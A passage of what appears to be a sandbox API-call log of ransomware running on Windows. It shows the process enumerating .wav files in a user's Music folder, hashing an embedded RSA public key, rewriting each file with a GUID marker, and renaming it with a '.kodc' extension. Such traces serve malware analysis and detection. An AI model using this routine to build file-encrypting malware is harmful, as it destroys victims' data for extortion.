Size=0x104) returned 0x9b8c540 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8160 | out: hHeap=0x630000) returned 1 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8148 | out: hHeap=0x630000) returned 1 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.767] GetCurrentThreadId () returned 0x42c [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8788 [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.767] GetCurrentThreadId () returned 0x42c [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8148 [0101.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8160 [0101.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8130 [0101.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.769] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbffa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.769] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.769] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.769] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.770] CloseHandle (hObject=0x5cc) returned 1 [0101.771] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\6LkDjRHqx5diGXRVJZ-E.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\6lkdjrhqx5digxrvjz-e.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\6LkDjRHqx5diGXRVJZ-E.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\6lkdjrhqx5digxrvjz-e.wav.kodc")) returned 1 [0101.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.772] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.773] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2cd18b0, ftCreationTime.dwHighDateTime=0x1d5b99a, ftLastAccessTime.dwLowDateTime=0x82868b10, ftLastAccessTime.dwHighDateTime=0x1d5be34, ftLastWriteTime.dwLowDateTime=0x82868b10, ftLastWriteTime.dwHighDateTime=0x1d5be34, nFileSizeHigh=0x0, nFileSizeLow=0xbfdb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d0KBQhm-SGZjCX4Wq_U.wav", cAlternateFileName="D0KBQH~1.WAV")) returned 1 [0101.773] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\d0KBQhm-SGZjCX4Wq_U.wav") returned=".wav" [0101.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\d0KBQhm-SGZjCX4Wq_U.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\d0kbqhm-sgzjcx4wq_u.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.773] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=49115) returned 1 [0101.773] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.776] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbfb5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.776] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.777] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.777] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xbfdb, lpOverlapped=0x0) returned 1 [0101.778] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.778] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.778] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.778] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.779] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.779] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.779] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.779] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.779] GetLastError () returned 0x0 [0101.779] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.779] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.779] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.779] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.779] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbfe0) returned 0x9ba8d90 [0101.779] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6358 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8118 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb63a0 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8130 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8160 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8178 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.780] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8160 | out: hHeap=0x630000) returned 1 [0101.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8178 | out: hHeap=0x630000) returned 1 [0101.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8178 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8160 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8178 | out: hHeap=0x630000) returned 1 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8160 | out: hHeap=0x630000) returned 1 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.781] GetCurrentThreadId () returned 0x42c [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8818 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.781] GetCurrentThreadId () returned 0x42c [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8160 [0101.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0101.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8178 [0101.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8148 [0101.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8190 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8160 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap 